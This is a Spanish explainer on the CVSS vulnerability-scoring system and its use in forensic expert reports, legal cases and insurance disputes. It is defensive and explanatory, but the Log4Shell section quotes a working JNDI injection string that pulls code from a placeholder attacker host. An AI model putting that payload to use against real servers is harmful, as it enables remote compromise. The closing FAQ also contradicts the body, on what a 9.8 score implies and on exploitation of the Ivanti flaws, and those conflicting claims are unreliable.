CVSS (Common Vulnerability Scoring System)
Estándar abierto que asigna una puntuación de 0,0 a 10,0 a las vulnerabilidades de software según su gravedad técnica. Una puntuación de 9,0 o más recibe la calificación cualitativa «crítica»; el número por sí solo no determina el tipo de vulnerabilidad ni si hay explotación remota sin autenticación, que se comprueban en el vector CVSS y en la ficha del CVE.
CVSS 9.8: dos vulnerabilidades críticas de Ivanti EPMM. En enero de 2026, dos vulnerabilidades en Ivanti Endpoint Manager Mobile (EPMM) con puntuación CVSS 9.8 cada una (CVE-2026-1281 y CVE-2026-1340) permitían ejecutar comandos en el servidor sin necesidad de autenticación, y CERT-EU avisó de que una de ellas ya se estaba explotando en un número limitado de casos. Cuatro años antes, Log4Shell (CVE-2021-44228) alcanzó la puntuación máxima de CVSS 10.0; Google, tras corregir su estimación inicial, cifró el ecosistema afectado en más de 17.000 paquetes Java, alrededor del 4 % de Maven Central. Detrás de estas cifras hay un sistema que traduce la complejidad técnica de las vulnerabilidades en un número: el CVSS (Common Vulnerability Scoring System), que permite a un perito informático explicar a un juez, en un solo dato, la gravedad técnica de una vulnerabilidad.
Definición técnica de CVSS
El CVSS (Common Vulnerability Scoring System) es un estándar abierto y gratuito que proporciona una puntuación numérica de 0.0 a 10.0 para evaluar la gravedad de las vulnerabilidades de seguridad informática. Su primera versión fue encargada por el NIAC y desarrollada por un grupo de organizaciones de la industria; hoy lo mantiene y desarrolla el Forum of Incident Response and Security Teams (FIRST). En su versión 4.0 (publicada en noviembre de 2023), se ha convertido en el lenguaje común de la industria para comunicar la severidad de fallos de seguridad.
El CVSS usa un conjunto de métricas definidas que dan una terminología reproducible para documentar la severidad; ahora bien, la selección de los valores requiere juicio técnico, y FIRST admite que una misma vulnerabilidad pueda recibir más de una puntuación base (según producto, versión o plataforma). Es una herramienta útil en informes periciales, pero el número no convierte por sí solo la valoración en objetiva ni sustituye el análisis del caso.
Dato clave
CVSS es el estándar de facto para priorizar vulnerabilidades: lo publican como puntuación oficial el NVD del NIST y lo especifica FIRST, y en España el CCN-CERT y el INCIBE lo emplean habitualmente en sus avisos de seguridad.
El CVSS no mide el riesgo total de una vulnerabilidad para una organización concreta: mide la gravedad técnica intrinseca. El riesgo real depende además del contexto de cada organización: que sistemas están expuestos, que datos procesan y que controles compensatorios existen.
Métricas CVSS v4.0: cómo se calcula la puntuación
La versión 4.0 del CVSS introduce mejoras significativas respecto a la v3.1, incluyendo nuevos grupos de métricas y mayor granularidad. El sistema se estructura en cuatro grupos principales de métricas:
Grupo 1: Métricas Base (Base Score)
Las métricas base representan las características intrinsecas de la vulnerabilidad que no cambian con el tiempo ni dependen del entorno. Son las más importantes y las únicas obligatorias para calcular una puntuación CVSS.
| Métrica | Valores posibles | Que mide |
|---|---|---|
| Vector de ataque (AV) | Network, Adjacent, Local, Physical | Como puede acceder el atacante al componente vulnerable |
| Complejidad de ataque (AC) | Low, High | Condiciones adicionales necesarias para explotar la vulnerabilidad |
| Requisitos de ataque (AT) | None, Present | Condiciones previas del sistema vulnerable (nuevo en v4.0) |
| Privilegios requeridos (PR) | None, Low, High | Nivel de acceso previo necesario para explotar la vulnerabilidad |
| Interacción del usuario (UI) | None, Passive, Active | Si la víctima debe realizar alguna acción (v4.0 distingue pasiva/activa) |
| Impacto en confidencialidad (VC/SC) | None, Low, High | Perdida de confidencialidad en el sistema vulnerable y sistemas posteriores |
| Impacto en integridad (VI/SI) | None, Low, High | Modificación no autorizada de datos |
| Impacto en disponibilidad (VA/SA) | None, Low, High | Perdida de acceso a recursos del sistema |
Grupo 2: Métricas de Amenaza (Threat Metrics)
Reflejan el estado actual de explotación de la vulnerabilidad. En CVSS v4.0, estas métricas sustituyen a las anteriores “Temporal Metrics” de la v3.1.
| Métrica | Valores | Que mide |
|---|---|---|
| Madurez del exploit (E) | Not Defined, Attacked, POC, Unreported | Si existe exploit disponible y si hay ataques activos documentados |
Grupo 3: Métricas Ambientales (Environmental Metrics)
Permiten ajustar la puntuación al contexto específico de una organización. Son clave para la priorizacion interna.
| Métrica | Que ajusta |
|---|---|
| Requisitos de confidencialidad (CR) | Importancia de la confidencialidad para el activo afectado |
| Requisitos de integridad (IR) | Importancia de la integridad para el activo |
| Requisitos de disponibilidad (AR) | Importancia de la disponibilidad para el activo |
| Métricas base modificadas | Sobreescritura de métricas base según el entorno |
Grupo 4: Métricas Suplementarias (Supplemental Metrics) - Nuevo en v4.0
| Métrica | Que describe |
|---|---|
| Automatizable (Automatable) | Si el ataque se puede automatizar (gusano) |
| Recuperación (Recovery) | Capacidad del sistema de recuperarse tras la explotación |
| Densidad de valor (Value Density) | Riqueza de datos accesibles por el atacante |
| Esfuerzo de respuesta (Response Effort) | Recursos necesarios para responder al incidente |
| Urgencia del proveedor (Provider Urgency) | Evaluación de urgencia del propio fabricante |
| Seguridad física (Safety, S) | Posible impacto previsible sobre la seguridad de las personas |
CVSS v4.0 vs v3.1
Conviven datos CVSS v3.x y v4.0: la NVD del NIST admite ambas y muestra v4.0 cuando está disponible. Un perito forense debe registrar siempre la versión, el vector y la fuente de cada puntuación en su informe, porque las puntuaciones v3.1 y v4.0 de una misma vulnerabilidad pueden diferir.
Escala de severidad CVSS: que significa cada rango
La puntuación numérica se traduce en una escala cualitativa de severidad que facilita la comunicación con audiencias no técnicas, como jueces, abogados y directivos:
| Rango | Severidad | Ejemplo real | CVSS |
|---|---|---|---|
| 0.0 | Ninguna | Vulnerabilidad teórica sin impacto | 0.0 |
| 0.1 - 3.9 | Baja | Divulgación limitada de información no sensible | 3.1 |
| 4.0 - 6.9 | Media | XSS reflejado que requiere interacción del usuario | 5.4 |
| 7.0 - 8.9 | Alta | EternalBlue (CVE-2017-0144): ejecución remota en Windows SMB | 8.8 |
| 9.0 - 10.0 | Crítica | Log4Shell (CVE-2021-44228): ejecución remota sin autenticación | 10.0 |
Regla practica para informes periciales
El CVSS no establece plazos de parcheo. La prioridad debe decidirse con la severidad y el vector, la exposición del activo, la explotación conocida (KEV/EPSS), los controles compensatorios y los requisitos normativos o contractuales aplicables. El único calendario vinculante y publicado es el que CISA impone a las agencias federales civiles estadounidenses sobre su catálogo KEV, con fecha límite vulnerabilidad por vulnerabilidad; fuera de ese ámbito, KEV funciona como señal de priorización, no como un plazo jurídico universal.
Vulnerabilidades históricas con CVSS: casos reales
El CVSS cobra significado real cuando se aplica a vulnerabilidades que han causado daños medibles. Esta tabla recoge cuatro de las vulnerabilidades más impactantes de la historia reciente, con su puntuación CVSS y consecuencias:
| Vulnerabilidad | CVE | CVSS | Año | Vector de ataque | Impacto real |
|---|---|---|---|---|---|
| Log4Shell | CVE-2021-44228 | 10.0 | 2021 | Red, sin autenticación, sin interacción | ~17.000 paquetes Java afectados (≈4 % de Maven Central, cifra corregida por Google). Cloudflare observó el primer intento de explotación 9 minutos tras la divulgación |
| Ivanti EPMM | CVE-2026-1281 / CVE-2026-1340 | 9.8 | 2026 | Red, sin autenticación, sin interacción | RCE no autenticada en el servidor EPMM; CERT-EU informó de explotación en casos limitados de una de ellas |
| EternalBlue | CVE-2017-0144 | 8.8 | 2017 | Red, complejidad baja | Usado por WannaCry y NotPetya. Paralizo hospitales (NHS), logística (Maersk, 300M$ pérdidas), telecomunicaciones |
| Heartbleed | CVE-2014-0160 | 7.5 | 2014 | Red, sin autenticación | ~17 % de los servidores SSL con certificados de CA de confianza (Netcraft). Filtración de claves privadas, credenciales y datos de memoria |
Análisis detallado: Log4Shell (CVSS 10.0)
Log4Shell es el ejemplo paradigmático de lo que significa una puntuación CVSS máxima. Cada métrica base contribuyó a la puntuación perfecta de 10.0:
| Métrica | Valor | Justificación |
|---|---|---|
| Vector de ataque | Network | Explotable remotamente a traves de la red |
| Complejidad | Low | Sin condiciones especiales, trivial de explotar |
| Privilegios | None | No se necesita ningun acceso previo |
| Interacción usuario | None | La víctima no necesita hacer nada |
| Impacto confidencialidad | High | Acceso total a datos del sistema |
| Impacto integridad | High | Modificación completa de datos y sistema |
| Impacto disponibilidad | High | Denegación completa del servicio |
La consecuencia: una aplicación Java que usara log4j-core en una versión vulnerable y registrara en el log datos controlados por el atacante podía ser comprometida remotamente con una cadena como ${jndi:ldap://atacante.invalid/exploit} (usar solo log4j-api, sin log4j-core, no bastaba para estar afectado). La puntuación CVSS 10.0 comunicaba de forma inequívoca la urgencia de parchear.
Análisis detallado: Ivanti EPMM (CVSS 9.8)
El 29 de enero de 2026, Ivanti publicó dos vulnerabilidades de inyección de código en EPMM (CVE-2026-1281 y CVE-2026-1340), ambas con CVSS 9.8 y posibilidad de ejecución remota no autenticada. El aviso de CERT-EU del 30 de enero indicó que una de ellas se había explotado en un número limitado de casos. La puntuación 9.8 (no 10.0) se debe a un único factor:
| Métrica | Valor | Por qué no fue 10.0 |
|---|---|---|
| Vector de ataque | Network | Explotable remotamente |
| Complejidad | Low | Trivial de explotar |
| Privilegios | None | Sin autenticación previa |
| Interacción usuario | None | Sin interacción |
| Alcance | Unchanged | El componente vulnerable y el impactado quedan bajo la misma autoridad de seguridad (no mide «propagación automática») |
La diferencia entre CVSS 9.8 y 10.0 es técnica (el alcance), pero en la práctica ambas exigen remediación prioritaria. Que una brecha se causara por una vulnerabilidad CVSS 9.8 sin parchear es un elemento técnico relevante; la diligencia, sin embargo, se valora con las circunstancias del caso (exposición, controles, tiempos), no se deduce automáticamente del número.
CVSS en investigaciones forenses: aplicación práctica
Para un perito informático, el CVSS es una herramienta fundamental que traduce complejidad técnica en un dato que jueces, abogados y aseguradoras pueden comprender. Su uso en investigaciones forenses abarca múltiples dimensiones:
Escenarios donde el CVSS es determinante
| Escenario forense | Rol del CVSS | Impacto en el caso |
|---|---|---|
| Brecha de datos con negligencia | Cuantifica la gravedad de la vulnerabilidad no parcheada | Determina si la organización actuó con diligencia |
| Reclamación de ciberseguro | Aporta contexto técnico sobre si la vulnerabilidad era conocida y estaba parcheada | La cobertura depende del condicionado de la póliza y de los hechos del siniestro; el CVSS no la decide por sí solo |
| Sanción AEPD/RGPD | Aporta contexto técnico sobre si las medidas eran «adecuadas al riesgo» | Elemento a valorar con las circunstancias del art. 83 RGPD; no es un agravante ni un atenuante automático |
| Responsabilidad de proveedor | Evalua si el software entregado cumplia estándares de seguridad | CVSS alto en producto vendido puede ser incumplimiento contractual |
| Peritaje tras ransomware | Identifica el vector de entrada y su gravedad técnica | Un CVSS 9.0+ sin parchear es un indicio técnico, a ponderar con exposición, controles y tiempos |
El CVSS como lenguaje comun en sala
Cuando un perito declara ante un tribunal que “la vulnerabilidad explotada tenía una puntuación CVSS de 9.8 sobre 10, clasificada como crítica por el estándar internacional utilizado por FIRST, el NIST y el CCN-CERT”, proporciona al juez un dato objetivo, estandarizado e internacionalmente reconocido que trasciende la jerga técnica.
Pasos del análisis forense con CVSS
Identificar la vulnerabilidad explotada
Mediante el análisis de logs, tráfico de red, memoria y artefactos del sistema, el perito identifica el CVE específico que fue explotado. Herramientas como Nessus, OpenVAS o el análisis manual de exploits permiten correlacionar los indicadores de compromiso (IOCs) con vulnerabilidades conocidas.
Obtener la puntuación CVSS oficial
Consultar la puntuación en la National Vulnerability Database (NVD) del NIST o en la base de datos de FIRST. Registrar tanto la puntuación CVSS Base como la versión utilizada (v3.1 o v4.0). Si existen diferencias entre ambas versiones, documentar las dos.
Documentar el timeline crítico
Establecer la cronología completa: fecha de descubrimiento de la vulnerabilidad, fecha de asignación del CVE, fecha de publicación del parche por el fabricante, fecha de aviso por organismos oficiales (CISA KEV, CCN-CERT, INCIBE), y fecha del ataque. El intervalo entre la disponibilidad del parche y el ataque es la métrica clave para evaluar diligencia.
Evaluar el estado de parcheado de la víctima
Verificar las versiones de software instaladas en los sistemas comprometidos. Comprobar el historial de actualizaciones (Windows Update, apt logs, registros de gestión de parches). Documentar si existía un proceso formal de gestión de vulnerabilidades.
Calcular el CVSS ambiental ajustado
Aplicar las métricas ambientales al contexto de la organización víctima. Un hospital con datos de salud (requisito de confidencialidad alto) tendra un CVSS ambiental superior al base si la vulnerabilidad afecta a la confidencialidad. Un sistema de control industrial (requisito de disponibilidad alto) tendra un CVSS ambiental mayor si la vulnerabilidad afecta a la disponibilidad.
Elaborar la conclusión pericial con CVSS como soporte
Redactar las conclusiones apoyándose en el CVSS como una métrica más. Ejemplo: “La vulnerabilidad CVE-2026-XXXX, con puntuación CVSS 9.8 (crítica) y un parche disponible desde el DD/MM, permaneció sin aplicar 45 días pese a que el activo estaba expuesto y no constaban controles compensatorios. A criterio de este perito, y a la vista de esas circunstancias concretas, ese retraso denota una falta de diligencia en la gestión de la seguridad.” El CVSS no fija por sí solo un plazo; la valoración se sostiene en los hechos del caso.
CVSS en el marco legal español
El CVSS no es mencionado explícitamente en la legislación española, pero su relevancia jurídica es indirecta y creciente a traves de múltiples marcos normativos:
RGPD (Reglamento General de Protección de Datos)
El artículo 32 del RGPD exige “medidas técnicas y organizativas apropiadas para garantizar un nivel de seguridad adecuado al riesgo”. El CVSS proporciona la métrica objetiva para evaluar si las medidas eran “adecuadas”:
- CVSS 9.0-10.0 sin parchear: puede ser un indicio técnico de que las medidas no eran adecuadas al riesgo conocido, a valorar con el resto de circunstancias
- Parche disponible y no aplicado: elemento relevante, pero la AEPD pondera la intencionalidad o negligencia y las medidas aplicadas (art. 83.2 RGPD); no lo trata como agravante automático
- Zero-day: la ausencia de un parche conocido puede reducir el reproche, aunque no exime por sí sola; se valora la diligencia global
Las resoluciones sancionadoras de la AEPD son públicas y se consultan una a una, con su número de expediente PS/NNNNN/AAAA, en su buscador de resoluciones: ahí es donde puede comprobarse qué se sancionó exactamente en cada caso de vulnerabilidad no parcheada, en lugar de manejar un umbral genérico.
Directiva NIS2 (pendiente de transposición en España)
La NIS2 exige a entidades esenciales e importantes medidas adecuadas y proporcionadas de gestión de riesgos (Art. 21), que incluyen expresamente «la gestión y divulgación de las vulnerabilidades» (art. 21.2.e). El CVSS puede usarse para priorizar, pero la Directiva no lo impone ni fija una periodicidad de pentesting. La notificación (art. 23) se activa por incidentes con impacto significativo, no por el mero hecho de que involucren una vulnerabilidad «crítica».
Código Penal: diligencia y responsabilidad
En el ámbito penal, el CVSS es útil para determinar:
| Concepto legal | Como contribuye el CVSS |
|---|---|
| Diligencia debida | Demuestra si la organización conocía la gravedad del riesgo |
| Daños informáticos (Art. 264 CP) | Tipifica causar sin autorización daños graves a datos o sistemas ajenos; no regula la negligencia de la víctima al parchear |
| Responsabilidad del fabricante | CVSS alto en producto sin parche puede indicar defecto en seguridad |
| Atenuante | CVSS bajo o vulnerabilidad zero-day pueden atenuar responsabilidad de la víctima |
Ciberseguros y CVSS
Las pólizas de ciberseguro cada vez incluyen cláusulas más específicas relacionadas con la gestión de vulnerabilidades:
| Cláusula típica de póliza | Relación con CVSS |
|---|---|
| ”Mantener sistemas actualizados con parches críticos” | CVSS 9.0+ define qué es “crítico" |
| "Aplicar parches de seguridad en plazo razonable” | CVSS determina la urgencia del plazo |
| ”Exclusión por vulnerabilidad conocida no parcheada” | La fecha del CVE y el CVSS prueban el conocimiento |
Tendencia en ciberseguros
Las pólizas de ciberriesgo incorporan de forma creciente requisitos de gestión de vulnerabilidades y cláusulas de exclusión por fallo conocido y no corregido. Conviene leer el condicionado concreto de cada póliza —que es lo que obliga— en lugar de dar por supuesta una práctica común del sector: un informe pericial que acredite un CVSS 9.0+ sin parchear durante meses puede ser determinante para que la aseguradora deniegue la cobertura.
Limitaciones del CVSS y métricas complementarias
El CVSS, pese a ser el estándar más utilizado, tiene limitaciones que un perito forense debe conocer:
| Limitación | Explicación | Métrica complementaria |
|---|---|---|
| No mide el riesgo real | CVSS mide gravedad técnica, no probabilidad de explotación | EPSS (Exploit Prediction Scoring System) |
| No considera el contexto | Sin métricas ambientales, ignora el entorno de la organización | SSVC (Stakeholder-Specific Vulnerability Categorization) de CISA |
| Puntuación estática | La puntuación base no cambia, aunque aparezcan exploits | CVSS Threat Metrics + CISA KEV |
| Fatiga de alertas | Demasiadas vulnerabilidades “críticas” complican la priorizacion | EPSS filtra vulnerabilidades con alta probabilidad de explotación real |
EPSS (Exploit Prediction Scoring System): Desarrollado por FIRST (el mismo organismo detras de CVSS), EPSS calcula la probabilidad de que una vulnerabilidad sea explotada en los próximos 30 días, en una escala de 0 a 1. Un perito forense puede combinar CVSS (gravedad) con EPSS (probabilidad) para un análisis de riesgo más completo en su informe pericial.
Herramientas para calcular y consultar CVSS
| Herramienta | Función | Acceso |
|---|---|---|
| NVD (NIST) | Registros de CVE con puntuaciones CVSS del NIST, CNA o ADP cuando están disponibles (desde 2026, enriquecimiento por prioridad) | Gratuito: nvd.nist.gov |
| FIRST CVSS Calculator | Calculadora oficial interactiva para CVSS v4.0 y v3.1 | Gratuito: first.org/cvss/calculator |
| CVE.org | Programa CVE (gobernado por el CVE Board; MITRE ejerce de secretaría) | Gratuito: cve.org |
| CISA KEV | Catálogo de vulnerabilidades explotadas activamente | Gratuito: cisa.gov/known-exploited-vulnerabilities |
| Nessus / OpenVAS | Escáneres de vulnerabilidades que calculan CVSS automáticamente | Comercial / Open-source |
| CCN-CERT (España) | Avisos de seguridad con puntuaciones CVSS para administración publica | Gratuito: ccn-cert.cni.es |
Preguntas frecuentes
¿Qué significa una puntuación CVSS de 9.8?
Una puntuación CVSS de 9.8 recibe la calificación crítica. Un 9.8 se obtiene habitualmente cuando el vector es Network, con complejidad baja, sin autenticación ni privilegios previos y sin interacción del usuario, y con impacto alto en confidencialidad, integridad y disponibilidad. Ahora bien, esas características se leen en el vector CVSS de cada vulnerabilidad —varias combinaciones distintas pueden producir el mismo número—, no se deducen del 9.8 por sí solo.
La razón por la que alcanza 9.8 y no 10.0 suele ser el parámetro «Alcance» (Scope) de la versión 3.1: en S:U el componente vulnerable y el impactado están bajo la misma autoridad de seguridad, mientras que en un 10.0 como Log4Shell (S:C) el impacto alcanza a componentes bajo otra autoridad. La versión 4.0 sustituyó esa métrica única por el impacto diferenciado en el sistema vulnerable y en los sistemas posteriores.
Ejemplos recientes con CVSS 9.8: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM, y CVE-2024-21762 en FortiOS, incluida en el catálogo KEV de CISA y marcada con uso conocido en campañas de ransomware.
¿Cómo se calcula la puntuación CVSS?
El cálculo en CVSS v3.1 combina las métricas base mediante una fórmula (CVSS v4.0 cambió el método a macrovectores e interpolación y eliminó la métrica única Scope). El proceso en v3.1 es el siguiente:
- Evaluar cada métrica base: Para cada una de las 8+ métricas (vector de ataque, complejidad, privilegios, interacción del usuario, impacto en CIA), se selecciona el valor que describe la vulnerabilidad
- Asignar pesos numéricos: Cada valor tiene un peso predefinido por el estándar (por ejemplo, AV:Network = 0.85, AV:Local = 0.55)
- Calcular sub-puntuaciones: Se combinan los pesos de explotabilidad (AV, AC, PR, UI) y los de impacto (C, I, A) en sub-puntuaciones
- Aplicar la fórmula final: La fórmula combina las sub-puntuaciones con un factor de ajuste por alcance (Scope), produciendo un número entre 0.0 y 10.0
- Redondear al decimal superior: El resultado se redondea a un decimal
En la practica, la mayoría de los profesionales utilizan la calculadora oficial de FIRST o las puntuaciones ya asignadas por el NIST en la NVD, en lugar de calcular manualmente. Lo importante para un perito forense es entender que significa cada métrica y como impacta en la puntuación final, para poder explicarlo ante un tribunal.
¿Por qué es importante el CVSS en un informe pericial forense?
El CVSS aporta cuatro valores fundamentales a un informe pericial:
- Objetividad: La puntuación es calculada mediante un estándar internacional público, no es una opinion subjetiva del perito. Cualquier otro profesional puede verificar independientemente la puntuación
- Universalidad: El CVSS es comprendido por la industria de ciberseguridad a nivel mundial. Cuando un perito cita CVSS 9.8, cualquier experto en cualquier país entiende exactamente la gravedad
- Comprensibilidad judicial: Un juez sin conocimientos técnicos puede entender “9.8 sobre 10, clasificado como crítico”. Es infinitamente más claro que explicar vectores de ataque, buffers overflow o inyecciones de código
- Determinación de diligencia: El CVSS, combinado con la fecha de publicación del parche y la fecha del ataque, aporta un elemento técnico objetivo para valorar la diligencia de la organización víctima, que se pondera con el resto de circunstancias del caso (exposición, controles y tiempos) y no se deduce automáticamente del número
El CVSS entra en un procedimiento como soporte técnico del razonamiento pericial, no como prueba en sí: sirve para explicar por qué una vulnerabilidad debió corregirse antes, en reclamaciones de ciberseguro, en expedientes por brechas de datos y en procedimientos por daños informáticos donde se discute la diligencia en la protección de los sistemas.
Conceptos relacionados
- CVE (Vulnerabilidades) - El sistema de identificación de vulnerabilidades cuya gravedad mide el CVSS
- Zero-Day - Vulnerabilidades desconocidas o sin corrección disponible; su severidad base depende de las características técnicas del vector CVSS, no de la ausencia de parche
- Pentesting - Los informes de pentesting clasifican hallazgos por puntuación CVSS
- IOCs (Indicadores de Compromiso) - Los IOCs se correlacionan con CVEs que tienen puntuaciones CVSS asignadas
- Análisis Forense Digital - Disciplina donde el CVSS contextualiza la gravedad de las vulnerabilidades explotadas
¿Sabrías qué demostrar si mañana te lo piden?
La diferencia entre un incidente gestionado y uno sancionado suele estar en qué quedó registrado, no en qué se hizo.
Referencias y fuentes
FIRST - “Common Vulnerability Scoring System v4.0 Specification”. first.org/cvss/v4.0/specification-document
NIST - “National Vulnerability Database (NVD)”. nvd.nist.gov
CVE-2026-1281 y CVE-2026-1340 (Ivanti EPMM, CVSS 9.8, publicadas el 29 de enero de 2026) — ficha CVE-2026-1281 en NVD. En el catálogo KEV de CISA: CVE-2026-1281 añadida el 29-ene-2026 (vence 1-feb) y CVE-2026-1340 añadida el 8-abr-2026 (vence 11-abr)
Apache Foundation - “Apache Log4j Security Vulnerabilities - CVE-2021-44228, CVSS 10.0”. logging.apache.org/log4j/2.x/security
Cloudflare — «Exploitation of CVE-2021-44228 before public disclosure…». blog.cloudflare.com — primer intento de explotación de Log4Shell nueve minutos tras la divulgación.
CISA - “Known Exploited Vulnerabilities Catalog”. cisa.gov/known-exploited-vulnerabilities-catalog
CCN-CERT - “Avisos de seguridad del Centro Criptológico Nacional”. ccn-cert.cni.es
Reglamento (UE) 2016/679 (RGPD) — art. 32, seguridad del tratamiento.
Directiva (UE) 2022/2555 (NIS2) — art. 21, medidas de gestión de riesgos de ciberseguridad.
FIRST - “Exploit Prediction Scoring System (EPSS)”. first.org/epss
Maersk — pérdidas de unos 300 millones de dólares por NotPetya, que se propagó explotando EternalBlue (CVE-2017-0144, CVSS v3.1 8.8) sin parchear. Comunicado corporativo, 2017.
Última actualización: Febrero 2026 Categoría: Seguridad Código: SEG-022
Preguntas Frecuentes
¿Qué significa una puntuación CVSS de 9.8?
Una puntuación CVSS de 9.8 sobre 10 indica una vulnerabilidad crítica que permite ejecución remota de código sin autenticación previa, a través de la red, sin interacción del usuario. Ejemplo: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM, explotadas activamente desde enero de 2026, tienen CVSS 9.8.
¿Cómo se calcula la puntuación CVSS?
CVSS v4.0 evalúa múltiples métricas: vector de ataque (red/local), complejidad, requisitos de ataque, privilegios requeridos, interacción del usuario e impacto en confidencialidad, integridad y disponibilidad, tanto del sistema vulnerable como de los sistemas posteriores. La combinación genera una puntuación de 0 a 10: Bajo (0.1-3.9), Medio (4.0-6.9), Alto (7.0-8.9), Crítico (9.0-10.0).
¿Por qué es importante el CVSS en un informe pericial forense?
El CVSS permite al perito informático cuantificar objetivamente la gravedad de la vulnerabilidad explotada en un incidente. En informes periciales para tribunales, el CVSS proporciona una métrica estándar internacional que los jueces pueden entender: 'la vulnerabilidad explotada tenía una gravedad de 9.8 sobre 10, clasificada como crítica por el estándar internacional CVSS'.
¿Necesitas un peritaje forense?
Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.
Solicitar Consulta Gratuita
